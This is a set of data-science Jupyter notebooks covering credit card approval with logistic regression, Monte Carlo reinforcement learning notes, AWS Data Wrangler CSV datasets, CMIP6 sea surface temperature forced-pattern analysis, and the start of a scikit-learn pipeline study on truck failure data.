Fitting a logistic regression model to the train set <p>Essentially, predicting if a credit card application will be approved or not is a <a href="https://en.wikipedia.org/wiki/Statistical_classification">classification</a> task. <a href="http://archive.ics.uci.edu/ml/machine-learning-databases/credit-screening/crx.names">According to UCI</a>, our dataset contains more instances that correspond to "Denied" status than instances corresponding to "Approved" status. 
Specifically, out of 690 instances, there are 383 (55.5%) applications that got denied and 307 (44.5%) applications that got approved. </p> <p>This gives us a benchmark. A good machine learning model should be able to accurately predict the status of the applications with respect to these statistics.</p> <p>Which model should we pick? A question to ask is: <em>are the features that affect the credit card approval decision process correlated with each other?</em> Although we can measure correlation, that is outside the scope of this notebook, so we'll rely on our intuition that they indeed are correlated for now. Because of this correlation, we'll take advantage of the fact that generalized linear models perform well in these cases. Let's start our machine learning modeling with a Logistic Regression model (a generalized linear model).</p> ``` # Import LogisticRegression # ... YOUR CODE FOR TASK 9 ... from sklearn.linear_model import LogisticRegression # Instantiate a LogisticRegression classifier with default parameter values logreg = LogisticRegression() # Fit logreg to the train set # ... YOUR CODE FOR TASK 9 ... logreg.fit(rescaledX_train, y_train) ``` ## 10. Making predictions and evaluating performance <p>But how well does our model perform? </p> <p>We will now evaluate our model on the test set with respect to <a href="https://developers.google.com/machine-learning/crash-course/classification/accuracy">classification accuracy</a>. But we will also take a look the model's <a href="http://www.dataschool.io/simple-guide-to-confusion-matrix-terminology/">confusion matrix</a>. In the case of predicting credit card applications, it is equally important to see if our machine learning model is able to predict the approval status of the applications as denied that originally got denied. If our model is not performing well in this aspect, then it might end up approving the application that should have been approved. 
The confusion matrix helps us to view our model's performance from these aspects. </p> ``` # Import confusion_matrix # ... YOUR CODE FOR TASK 10 ... from sklearn.metrics import confusion_matrix # Use logreg to predict instances from the test set and store it y_pred = logreg.predict(rescaledX_test) # Get the accuracy score of logreg model and print it print("Accuracy of logistic regression classifier: ", logreg.score(rescaledX_test, y_test)) # Print the confusion matrix of the logreg model # ... YOUR CODE FOR TASK 10 ... print(confusion_matrix(y_test, y_pred)) ``` ## 11. Grid searching and making the model perform better <p>Our model was pretty good! It was able to yield an accuracy score of almost 84%.</p> <p>For the confusion matrix, the first element of the of the first row of the confusion matrix denotes the true negatives meaning the number of negative instances (denied applications) predicted by the model correctly. And the last element of the second row of the confusion matrix denotes the true positives meaning the number of positive instances (approved applications) predicted by the model correctly.</p> <p>Let's see if we can do better. We can perform a <a href="https://machinelearningmastery.com/how-to-tune-algorithm-parameters-with-scikit-learn/">grid search</a> of the model parameters to improve the model's ability to predict credit card approvals.</p> <p><a href="http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html">scikit-learn's implementation of logistic regression</a> consists of different hyperparameters but we will grid search over the following two:</p> <ul> <li>tol</li> <li>max_iter</li> </ul> ``` # Import GridSearchCV # ... YOUR CODE FOR TASK 11 ... 
from sklearn.model_selection import GridSearchCV # Define the grid of values for tol and max_iter tol = [0.01, 0.001, 0.0001] max_iter = [100, 150, 200] # Create a dictionary where tol and max_iter are keys and the lists of their values are corresponding values param_grid = {'tol':tol, 'max_iter':max_iter} ``` ## 12. Finding the best performing model <p>We have defined the grid of hyperparameter values and converted them into a single dictionary format which <code>GridSearchCV()</code> expects as one of its parameters. Now, we will begin the grid search to see which values perform best.</p> <p>We will instantiate <code>GridSearchCV()</code> with our earlier <code>logreg</code> model with all the data we have. Instead of passing train and test sets separately, we will supply <code>X</code> (scaled version) and <code>y</code>. We will also instruct <code>GridSearchCV()</code> to perform a <a href="https://www.dataschool.io/machine-learning-with-scikit-learn/">cross-validation</a> of five folds.</p> <p>We'll end the notebook by storing the best-achieved score and the respective best parameters.</p> <p>While building this credit card predictor, we tackled some of the most widely-known preprocessing steps such as <strong>scaling</strong>, <strong>label encoding</strong>, and <strong>missing value imputation</strong>. We finished with some <strong>machine learning</strong> to predict if a person's application for a credit card would get approved or not given some information about that person.</p> ``` # Instantiate GridSearchCV with the required parameters grid_model = GridSearchCV(estimator = logreg, param_grid = param_grid, cv = 5) # Use scaler to rescale X and assign it to rescaledX rescaledX = scaler.fit_transform(X) # Fit data to grid_model grid_model_result = grid_model.fit(rescaledX, y) # Summarize results best_score, best_params = grid_model_result.best_score_, grid_model_result.best_params_ print("Best: %f using %s" % (best_score, best_params)) ```
github_jupyter
# Chapter 5: Monte Carlo Methods ## 1. Introduction - Do not assume complete knownledge of the environment - Learning from experience of interaction with environment - Experience is divided into **episodes** - Based on averaging sample returns - complete returns of each episode - Like an associative bandit - Nonstationary from the point of view of the earlier state - Adapt the idea of GPI from DP ## 2. Monte Carlo Prediction - Learning the state-value function $v_\pi(s)$ for a given policy $\pi$ - Estimate from experience by averaging the returns observed after visits to that state $s$ - a **visit** to $s$: each occurrence of state $s$ in an episode - 2 methods: - **first-visit** MC: average of the returns only for the first visits to $s$ - **every-visit** MC: average of the returns for all visits to $s$ - Only on choice considered at each state (unlike DP) - only sampled on the one episode - Estimates for each state are independent - computational expense of estimating a single state is independent of the number of states - Do not bootstrap (unlike DP) - first-visit MC algorithm ![First-Visit MC](assets/5.1.first-visit-mc.png) ## 3. Monte Carlo Estimation of Action Values - if a model is not available, MC is useful to estimate action values $q_*$ - Averaging returns starting from state $s$, taking action $a$ following policy $\pi$ - a **visit** to pair $s,a$: each occurrence of state $s$ and action $a$ is taken in it, in an episode - 2 methods: - first-visit MC: average of the returns only for the first visits to $s, a$ - every-visit MC: average of the returns for all visits to $s, a$ - Need to estimate the value of all the actions from each state - **Exploring starts**: every pairs $s,a$ has nonzero probability of being selected as the start ## 4. 
Monte Carlo Control - Use GPI $$\pi_0 \stackrel{E}{\longrightarrow} q_{\pi_0} \stackrel{I}{\longrightarrow} \pi_1 \stackrel{E}{\longrightarrow} q_{\pi_1} \stackrel{I}{\longrightarrow} \pi_2 \stackrel{E}{\longrightarrow} ... \stackrel{I}{\longrightarrow} \pi_* \stackrel{E}{\longrightarrow} q_{\pi_*}$$ - Policy evaluation $\stackrel{E}{\longrightarrow}$: using MC methods for prediction - Policy improment $\stackrel{I}{\longrightarrow}$: policy greedy with respect to the current value function - meets the conditions for policy improvement by policy improvement theorem - if, $\pi_{k+1}=\pi_k$, then $\pi_k=\pi_*$ $$ \begin{aligned} q_{\pi_k}\big(s,\pi_{k+1}(s)\big) &= q_{\pi_k}\big(s,\arg\max_a q_{\pi_k}(s,a)\big) \\ &= \max_a q_{\pi_k}(s,a) \\ &\ge q_{\pi_k}\big(s,\pi_k(s)\big) \\ &\ge v_{\pi_k}(s) \end{aligned} $$ - Converage conditions assumptions: - (1) episodes have exploring starts - (2) policy evaluation could be done with an infinite number of episodes - Need to remove both assumptions in order to obtain a practical algorithm - Solve the assumption (2): - Obtain bounds on the magnitude and probability of error in the estimates, assure that these bounds are sufficiently small - Value Iteration - Alterate between improvement and evaluation steps for single states - Monte Carlo Exploring Starts (*Monte Carlo ES*) - alterate between evaluation and improvement on an episode-by-episode basis - convergence to this fixed point (fixed point is optimal policy $\pi_*$) seems inevitable ![Monte Carlo Exploring Starts](assets/5.3.mc-es.png) - Monte Carlo without Exploring Starts - **on-policy** methods: evaluate or improve the policy that is used to make decisions - **off-policy** methods: evaluate or improve the policy different from that is used to generate the data ## 5. 
On-Policy method - Learn about policy currently executing - Policy is generally soft $\pi(a | s) > 0$ - ε-soft policy like ε-greedy: - probability of nongreedy is $\dfrac{\epsilon}{| \mathcal A(s) |}$ - and, probability of greedy is $1-\epsilon+\dfrac{\epsilon}{| \mathcal A(s) |}$ - ε-greedy with respect to $q_\pi$ is an improvement over any ε-soft policy $\pi$ is assured by the policy improvement theorem $$ \begin{aligned} q_\pi\big(s,\pi'(s)\big) &= \sum_a \pi'(a | s) q_\pi(s,a) \\ &= \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + (1-\epsilon)\max_a q_\pi(s,a) \\ &\ge \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + (1-\epsilon)\sum_a \frac{\pi(a | s)-\frac{\epsilon}{| \mathcal A(s) |}}{1-\epsilon} q_\pi(s,a) \\ &= \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) - \frac{\epsilon}{| \mathcal A(s) |}\sum_a q_\pi(s,a) + \sum_a \pi(a | s) q_\pi(s,a) \\ &\ge v_\pi(s) \end{aligned} $$ - Converages to best ε-soft policy $v_\pi=\tilde v_* ~~~, \forall s\in\mathcal S$ ![On-Policy e-soft](assets/5.4.e-soft.png) ## 6. 
Off-policy method - learn the value of the **target policy** $\pi$ from experience due to **behavior policy** $b$ - optimal policy: target policy - exploratory & generate policy: behavior policy - more powerfull and general than on-policy - greater variance and slower to converge - on-policy methods is special case in which $\pi = b$ - Coverage assumption: $b$ generates behavior that covers, or includes, $\pi$ $$\pi(a | s) > 0 \implies b(a | s) > 0$$ - Method: use **importance sampling** - estimate expected values under one distribution given samples from another - **importance-sampling ratio**: weighting returns according to the relative probability of their trajectories under the two policies - The relative probability of the trajectory under 2 polices depend only on the 2 policies and the sequence: $$\rho_{t:T-1} = \prod_{k=1}^{T-1}\frac{\pi(A_k | S_k)}{b(A_k | S_k)}$$ - Expected value of target policy: $$v_\pi(s) = E\big[\rho_{t:T-1}G_t | S_t=s\big]$$ where, $G_t$ is returns of $b$ : $v_b(s) = E\big[G_t | S_t=s\big]$ - indexing time steps in a way that increases across episode boundaries - first episode ends in terminal state at time $t-1=100$ - next episode begins at time $t=101$ - 2 types of importance sampling: - **ordinary importance sampling**: $$V(s) = \frac{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}G_t}{| \mathscr T |}$$ - **weighted importance sampling**: $$V(s) = \frac{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}G_t}{\sum_{t\in\mathscr T(s)}\rho_{t:T(t)-1}}$$ where: - $\mathscr T(s)$: set of all time steps in which state $s$ is visited - $T(t)$: first time of termination following time $t$ - $G_t$: returns after $t$ up through $T(t)$ - $\{G_t\}_{t\in\mathscr T(s)}$ are the returns that pertain to state $s$ - $\{\rho_{t:T(t)-1}\}_{t\in\mathscr T(s)}$ are the corresponding importance-sampling ratios - for the *first-visit* methods: - ordinary importance sampling is unbiased and variance is unbounded - weighted importance sampling is biased and variance is bound 
$[0, 1)$ (converges to zero) - for the *every-visit* methods: - both biased - bias falls asymptotically to zero as the number of samples increases ## 7. Incremental Implementation for MC prediction - similar to Bandits ([Chap 2](chap2.ipynb#5.-Incremental-Implementation)) but for the average *returns* $G_t$ instead of average *rewards* $R_t$ - for *on-policy*: exactly the same methods as Bandits - for *ordinary importance sampling* - scaling returns by $\rho_{t:T(t)-1}$ - for *weighted importance sampling* - have sequence of returns $G_1, G_2, ..., G_{n-1}$ all starting in the same state - corresponding random weight $W_i$ (e.g., $W_i = \rho_{t_i:T(t_i)-1}$) $$V_n = \frac{\sum_{k=1}^{n-1}W_kG_k}{\sum_{k=1}^{n-1}W_k} ~~~, n\ge 2$$ - update rule: $$ \begin{cases} V_{n+1} &= V_n + \dfrac{W_n}{C_n}\big[G_n - V_n\big] ~~~, n\ge 1 \\ C_{n+1} &= C_n + W_{n+1} ~~~, C_0 = 0 \end{cases} $$ - can apply to on-policy when $\pi=b, W=1$ ![Weighted Importance Sampling](assets/5.6.weighted-importance-sampling.png) ## 8. Off-policy MC Control - Requires behavior $b$ is soft: $b(a | s) > 0$ - Advantage: - target policy $\pi$ may be deterministic (e.g., greedy) - while the behavior policy $b$ can continue to sample all possible actions - Disadvantages: - learn only from the tails of episodes (the remaining actions in the episode are greedy) - Greatly slow learning when non-greedy actions are common (states appearing in the early portions of long episodes) ![off-policy MC control](assets/5.7.off-policy-mc-control.png) ## 9. Discounting-aware Importance Sampling - Use discounted rewards structure of the returns to reduce the variance of off-policy estimators - **flat partial returns**: $$\overline G_{t:h} = R_{t+1} + R_{t+2} + ... + R_h ~~~, 0\le t < h\le T$$ - full return $G_t$ by flat partial returns: $$ \begin{aligned} G_t &= R_{t+1} + \gamma R_{t+2} + \gamma^2 R_{t+3} + ... 
+ \gamma^{T-t-1} R_T \\ &= (1-\gamma)R_{t+1} \\ & ~~~ + (1-\gamma)\gamma(R_{t+1} + R_{t+2}) \\ & ~~~ + (1-\gamma)\gamma^2(R_{t+1} + R_{t+2} + R_{t+3}) \\ & ~~~\vdots \\ & ~~~ + (1-\gamma)\gamma^{T-t-2}(R_{t+1} + R_{t+2} + ... + R_{T-1}) \\ & ~~~ + \gamma^{T-t-1}(R_{t+1} + R_{t+2} + ... + R_T) \\ &= (1-\gamma)\sum_{h=t+1}^{T-1}\gamma^{h-t-1}\overline G_{t:h} + \gamma^{T-t-1}\overline G_{t:T} \end{aligned} $$ - **discounting-aware** importance sampling - discount rate but have no effect if $\gamma=1$ - for ordinary importance-sampling estimator: $$V(s)=\dfrac{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1}\overline G_{t:h} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\overline G_{t:T(t)}\Big)}{| \mathscr T(s) |}$$ - for weighted importance-sampling estimator: $$V(s)=\dfrac{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1}\overline G_{t:h} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\overline G_{t:T(t)}\Big)}{\displaystyle\sum_{t\in\mathscr T(s)}\Big( (1-\gamma)\sum_{h=t+1}^{T(t)-1}\gamma^{h-t-1}\rho_{t:h-1} + \gamma^{T(t)-t-1}\rho_{t:T(t)-1}\Big)}$$ ## 10. Per-decision Importance Sampling - One more way of reducing variance, even if $\gamma=1$ - Use structure of the returns as sum of rewards $$ \begin{aligned} \rho_{t:T-1}G_t &= \rho_{t:T-1}(R_{t+1}+\gamma R_{t+2}+...+\gamma^{T-t-1} R_T) \\ &= \rho_{t:T-1}R_{t+1}+\gamma\rho_{t:T-1}R_{t+2}+...+\gamma^{T-t-1}\rho_{t:T-1}R_T \end{aligned} $$ where, sub-term $\rho_{t:T-1}R_{t+k}$ depend only on the first and the last rewards $$E[\rho_{t:T-1}R_{t+k}] = E[\rho_{t:t+k-1}R_{t+k}]$$ - **per-decision** importance-sampling $$E[\rho_{t:T-1}G_t] = E[\tilde G_t]$$ where, $\tilde G_t=\rho_{t:t}R_{t+1} + \gamma\rho_{t:t+1}R_{t+2} + \gamma^2\rho_{t:t+2}R_{t+3} + ... 
+ \gamma^{T-t-1}\rho_{t:T-1}R_T$ - Use for *ordinary* importance-sampling - same unbiased expectation (in the first-visit case) as the ordinary importance-sampling estimator $$V(s)=\frac{\sum_{t\in\mathscr T(s)}\tilde G_t}{| \mathscr T(s) |}$$ - NOT for weighted importance-sampling - the per-decision estimators proposed for the weighted case are not consistent (do not converge to the true value with infinite data)
github_jupyter
[![AWS Data Wrangler](_static/logo.png "AWS Data Wrangler")](https://github.com/awslabs/aws-data-wrangler) # 11 - CSV Datasets Wrangler has 3 different write modes to store CSV Datasets on Amazon S3. - **append** (Default) Only adds new files without any delete. - **overwrite** Deletes everything in the target directory and then add new files. - **overwrite_partitions** (Partition Upsert) Only deletes the paths of partitions that should be updated and then writes the new partitions files. It's like a "partition Upsert". ``` from datetime import date import awswrangler as wr import pandas as pd ``` ## Enter your bucket name: ``` import getpass bucket = getpass.getpass() path = f"s3://{bucket}/dataset/" ``` ## Checking/Creating Glue Catalog Databases ``` if "awswrangler_test" not in wr.catalog.databases().values: wr.catalog.create_database("awswrangler_test") ``` ## Creating the Dataset ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Appending ``` df = pd.DataFrame({ "id": [3], "value": ["bar"], "date": [date(2020, 1, 3)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="append", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Overwriting ``` wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", table="csv_dataset" ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Creating a **Partitoned** Dataset ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite", database="awswrangler_test", 
table="csv_dataset", partition_cols=["date"] ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## Upserting partitions (overwrite_partitions) ``` df = pd.DataFrame({ "id": [2, 3], "value": ["xoo", "bar"], "date": [date(2020, 1, 2), date(2020, 1, 3)] }) wr.s3.to_csv( df=df, path=path, index=False, dataset=True, mode="overwrite_partitions", database="awswrangler_test", table="csv_dataset", partition_cols=["date"] ) wr.athena.read_sql_table(database="awswrangler_test", table="csv_dataset") ``` ## BONUS - Glue/Athena integration ``` df = pd.DataFrame({ "id": [1, 2], "value": ["foo", "boo"], "date": [date(2020, 1, 1), date(2020, 1, 2)] }) wr.s3.to_csv( df=df, path=path, dataset=True, index=False, mode="overwrite", database="aws_data_wrangler", table="my_table", compression="gzip" ) wr.athena.read_sql_query("SELECT * FROM my_table", database="aws_data_wrangler") ```
github_jupyter
# Forced pattern analysis of SST Reading in SST data and performing low-frequency component analysis ``` %matplotlib inline import xarray as xr import numpy as np import matplotlib.pyplot as plt import intake #import cftime # util.py is in the local directory # it contains code that is common across project notebooks # or routines that are too extensive and might otherwise clutter # the notebook design import util ``` ## Using `intake-esm` to get SST data [Intake-esm](https://intake-esm.readthedocs.io) is a data cataloging utility that facilitates access to CMIP data. It's pretty awesome. An `intake-esm` collection object establishes a link to a database that contains file locations and associated metadata (i.e. which experiement, model, etc. thet come from). ### Opening a collection First step is to open a collection by pointing to the collection definition file, which is a JSON file that conforms to the [ESM Collection Specification](https://github.com/NCAR/esm-collection-spec). The collection JSON files are stored locally in this repository for purposes of reproducibility---and because Cheyenne compute nodes don't have Internet access. The primary source for these files is the [intake-esm-datastore](https://github.com/NCAR/intake-esm-datastore) repository. Any changes made to these files should be pulled from that repo. For instance, the Pangeo cloud collection is available [here](https://raw.githubusercontent.com/NCAR/intake-esm-datastore/master/catalogs/pangeo-cmip6.json). ``` if util.is_ncar_host(): col = intake.open_esm_datastore("../catalogs/glade-cmip6.json") else: col = intake.open_esm_datastore("../catalogs/pangeo-cmip6.json") #col ``` `intake-esm` is build on top of [pandas](https://pandas.pydata.org/pandas-docs/stable). It is possible to view the `pandas.DataFrame` as follows. ``` #col.df.head() ``` It is possible to interact with the `DataFrame`; for instance, we can see what the "attributes" of the datasets are by printing the columns. 
``` #col.df.columns ``` ### Search and discovery #### Finding unique entries Let's query the data to see what models ("source_id"), experiments ("experiment_id") and temporal frequencies ("table_id") are available. ``` import pprint uni_dict = col.unique(['source_id', 'experiment_id', 'table_id']) #pprint.pprint(uni_dict, compact=True) ``` #### Searching for specific datasets Let's find all the monthly surface temperature (`ts`) data from the atmosphere for the `historical` and `ssp585` experiments. ``` cat = col.search(experiment_id=['historical', 'ssp585'], table_id='Amon', variable_id='ts', grid_label='gn') #cat.df ``` It might be desirable to get more specific. For instance, we may want to select only the models that have *both* `historical` and `ssp585` data. We could do this as follows. ``` models = set(uni_dict['source_id']['values']) # all the models for experiment_id in ['historical', 'ssp585']: query = dict(experiment_id=experiment_id, table_id='Amon', variable_id='ts', grid_label='gn') cat = col.search(**query) models = models.intersection({model for model in cat.df.source_id.unique().tolist()}) models = list(models) models cat = col.search(experiment_id=['historical', 'ssp585'], table_id='Amon', variable_id='ts', grid_label='gn', source_id=models) #cat.df ``` ### Loading data `intake-esm` enables loading data directly into an [xarray.Dataset](http://xarray.pydata.org/en/stable/api.html#dataset). Note that data on the cloud are in [zarr](https://zarr.readthedocs.io/en/stable/) format and data on [glade](https://www2.cisl.ucar.edu/resources/storage-and-file-systems/glade-file-spaces) are stored as [netCDF](https://www.unidata.ucar.edu/software/netcdf/) files. This is opaque to the user. `intake-esm` has rules for aggregating datasets; these rules are defined in the collection-specification file. 
``` dset_dict = cat.to_dataset_dict(zarr_kwargs={'consolidated': True, 'decode_times': True}, cdf_kwargs={'chunks': {}, 'decode_times': True}) ``` `dset_dict` is a dictionary of `xarray.Dataset`'s; its keys are constructed to refer to compatible groups. ``` dset_dict.keys() ``` We can access a particular dataset as follows. ``` # choose model here ds_hist = dset_dict['CMIP.MIROC.MIROC6.historical.Amon.gn'] ds_ssp585 = dset_dict['ScenarioMIP.MIROC.MIROC6.ssp585.Amon.gn'] ds_hist.ts ds_hist = ds_hist.chunk({'member_id': 1, 'time': 1980}) ds_ssp585 = ds_ssp585.chunk({'member_id': 1, 'time': 1980}) ``` ### Get land fraction As motivation for diving into more advanced manipulations with `intake-esm`, let's consider the task of getting access to grid information in the `Ofx` table_id. ``` cat_fx = col.search(experiment_id=['historical'], source_id=models, variable_id='sftlf', table_id='fx', grid_label='gn') #cat_fx.df df = cat_fx.df.copy() df.drop_duplicates(subset=['source_id', 'variable_id'], inplace=True) #df ``` Now, since we've only retained one ensemble member, we need to eliminate that column. If we omit this step, `intake-esm` will throw an error, complaining that different variables are present for each ensemble member. Setting the `member_id` column to NaN precludes attempts to join along the ensemble dimension. After this final manipulation, we copy the `DataFrame` back to the collection object and proceed with loading the data. 
``` df['member_id'] = np.nan cat_fx.df = df fx_dsets = cat_fx.to_dataset_dict(zarr_kwargs={'consolidated': True}, cdf_kwargs={'chunks': {}}) fx_dsets.keys() for key, ds in fx_dsets.items(): print(ds.data_vars) lat=ds_hist['lat'] lon=ds_hist['lon'] members = ds_hist['member_id'] ne = np.shape(members) ne members[0].values ds_ssp585.time hist_amean=ds_hist.groupby('time.year').mean('time') ssp585_amean=ds_ssp585.groupby('time.year').mean('time') hist_amean = hist_amean - hist_amean.mean('year') ssp585_amean = ssp585_amean - ssp585_amean.mean('year') hist_amean_emean = hist_amean.mean('member_id') ssp585_amean_emean = ssp585_amean.mean('member_id') hist_clim=ds_hist.groupby('time.month').mean('time') ssp585_clim=ds_ssp585.groupby('time.month').mean('time') hist_clim_emean = hist_clim.mean('member_id') ssp585_clim_emean = ssp585_clim.mean('member_id') hist_anom = ds_hist.groupby('time.month') - hist_clim ssp585_anom = ds_ssp585.groupby('time.month') - ssp585_clim hist_anom_emean = hist_anom.mean('member_id') ssp585_anom_emean = ssp585_anom.mean('member_id') field = ssp585_anom_emean.ts.values f=plt.figure() plt.contourf(lon,lat,np.mean(field[912:1031,:,:],0)-np.mean(field[0:119,:,:],0),np.arange(-10,10.1,.1),cmap=plt.cm.RdBu_r) cbar = plt.colorbar(extend='both') # Preprocessing for Large Ensemble EOFs (with upscaling) cosw = np.sqrt(np.cos(lat*np.pi/180)) X=hist_amean*cosw X_concat=X.stack(index=['year','member_id']) X_ensmean=X.mean('member_id') T = X_ensmean.year X_upscale = X_concat.coarsen(lon=2, lat = 2, boundary='trim').mean() X_ensmean_upscale = X_ensmean.coarsen(lon = 2, lat = 2, boundary='trim').mean() X_upscale_flat = X_upscale.stack(shape=['lat','lon']) X_ensmean_upscale_flat = X_ensmean_upscale.stack(shape=['lat','lon']) latu = X_upscale.lat.values lonu = X_upscale.lon.values %%time # Large Ensemble EOFs (with upscaling) u,s,v=np.linalg.svd(X_upscale_flat.ts.values/np.sqrt(len(T)-1)) eigvals=np.diag(s*s) cosw = np.sqrt(np.cos(latu*np.pi/180)) # Dimension 
checks #print(ds_upscale.shape) #plt.contourf(ds_upscale.lon,ds_upscale.lat,ds_upscale[0,0,:,:]) #ds_upscale.lat_bins Xe = X_ensmean_upscale_flat.ts.values Xs = X_upscale_flat.ts.values np.shape(Xe) np.shape(S) # Large Ensemble Forced Patterns neof=200 # changed from u S=np.matmul(v[:,0:neof],np.diag(1/s[0:neof])) Sadj=np.matmul(np.diag(s[0:neof]),v[:,0:neof].T) #EFPCs=np.matmul(ds_ensmean.values,S) EFPCs=np.matmul(Xe,S) gamma=np.cov(EFPCs.T) #covariance matrix u2,s2,v2=np.linalg.svd(gamma) EFP=np.matmul(v2,Sadj) #EFP_reshaped=EFP.reshape(neof,len(lat),len(lon))/cosw.values[None,:,None] EFP_reshaped=EFP.reshape(neof,len(latu),len(lonu))/cosw[None,:,None] #weights = np.matmul(S,v2.T).reshape(len(lat),len(lon),neof)*cosw.values[:,None,None] weights = np.matmul(S,v2.T) weights = weights.reshape(len(latu),len(lonu),neof)*cosw[:,None,None] #weights=weights.reshape(len(lat)*len(lon),neof) weights=weights.reshape(len(latu)*len(lonu),neof) #EFCs= np.matmul(ds_flat.values.T,weights) #EFC_emean = np.matmul(ds_ensmean.values,weights) EFCs= np.matmul(Xs,weights) EFC_emean = np.matmul(Xe,weights) for ii in range(neof): if np.mean(EFP[ii,:]) < 0: EFP_reshaped[ii,:,:] = -EFP_reshaped[ii,:,:] EFP[ii,:] = -EFP[ii,:] EFCs[:,ii] = -EFCs[:,ii] EFC_emean[:,ii] = -EFC_emean[:,ii] print(s2[0:20]) plt.plot(s2,marker='o') plt.xlim(0,20) plt.title('Signal-to-Noise Ratio') s2_check = np.zeros(20) for ii in range(20): s2_check[ii] = np.mean(np.square(EFC_emean[:,ii]))/np.mean(np.square(EFCs[:,ii])) print(s2_check) f=plt.figure() plt.plot(s2_check,marker='o') plt.title('Signal-to-Noise Ratio') EFP_reshaped[0,:,:] = EFP_reshaped[0,:,:]*np.std(EFCs[:,0]) EFP_reshaped[1,:,:] = EFP_reshaped[1,:,:]*np.std(EFCs[:,1]) EFP_reshaped[2,:,:] = EFP_reshaped[2,:,:]*np.std(EFCs[:,2]) EFC_emean[:,0] = EFC_emean[:,0]/np.std(EFCs[:,0]) EFC_emean[:,1] = EFC_emean[:,1]/np.std(EFCs[:,1]) EFC_emean[:,2] = EFC_emean[:,2]/np.std(EFCs[:,2]) EFCs[:,0] = EFCs[:,0]/np.std(EFCs[:,0]) EFCs[:,1] = 
EFCs[:,1]/np.std(EFCs[:,1]) EFCs[:,2] = EFCs[:,2]/np.std(EFCs[:,2]) f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[0,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[1,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') f=plt.figure() plt.pcolormesh(lonu,latu,np.squeeze(EFP_reshaped[2,:,:]),cmap=plt.cm.get_cmap('RdBu_r',20)) plt.clim(-0.8,0.8) plt.colorbar(extend='both') EFCs_reshape=EFCs.reshape(165,10,neof) #plt.plot(np.std(EFCs,axis=0),marker='o') #plt.xlim(0,20) #plt.title('Standard Deviation of EFC') for neof_plot in range(3): f=plt.figure() [plt.plot(T.values,EFCs_reshape[:,mm,neof_plot],color='crimson') for mm in range(10)]; plt.plot(T.values,EFC_emean[:,neof_plot]) plt.title('EFC'+str(neof_plot+1)) T = X_ensmean.year T ```
github_jupyter
# Investigation into Sklearn Pipelines for Scaling and Model Selection Using http://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html and data https://archive.ics.uci.edu/ml/datasets/APS+Failure+at+Scania+Trucks ``` import numpy as np import pandas as pd import re import os from pandas.plotting import scatter_matrix get_ipython().magic(u'env OMP_NUM_THREADS=2') from IPython.display import display, HTML import sklearn import sklearn.model_selection import requests import io import random # Set the ransom seed used for the whole program to allow reprocibility np.random.seed(3214412) DEBUG = True # If true, pull a sample of the dataset for development local_archive = "aps_failure_training_set.csv" if not os.path.exists(local_archive): print("Downloading contents") data_url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00421/aps_failure_training_set.csv" contents=requests.get(data_url).content # First 20 rows of the file is a header with licensing info # The header with column names is on row 21 raw_data_df=pd.read_csv(io.StringIO(contents.decode('utf-8')), skiprows=20, na_values="na") raw_data_df.to_csv(local_archive, index=False) else: print("Loading from local") raw_data_df=pd.read_csv(local_archive, na_values="na") raw_data_df.head() # This is a poc on sklearn-pipelines so drop down to 10 columns # Grab the 10 columns with the least number of null values and column "class" data_df = raw_data_df[raw_data_df.isnull().sum().sort_values()[:11].index].dropna() data_df.head() print("Count of rows: {}".format(data_df.shape[0])) print("Count of rows with class 'neg': {}".format(data_df[data_df['class'] == 'neg']['class'].shape[0])) print("Count of rows with class 'pos': {}".format(data_df[data_df['class'] == 'pos']['class'].shape[0])) # Describe all the columns at once display(pd.concat([data_df[col].describe().to_frame(name=col) for col in data_df.columns if col != 'class'], axis=1)) display(data_df['class'].value_counts()) ``` ## 
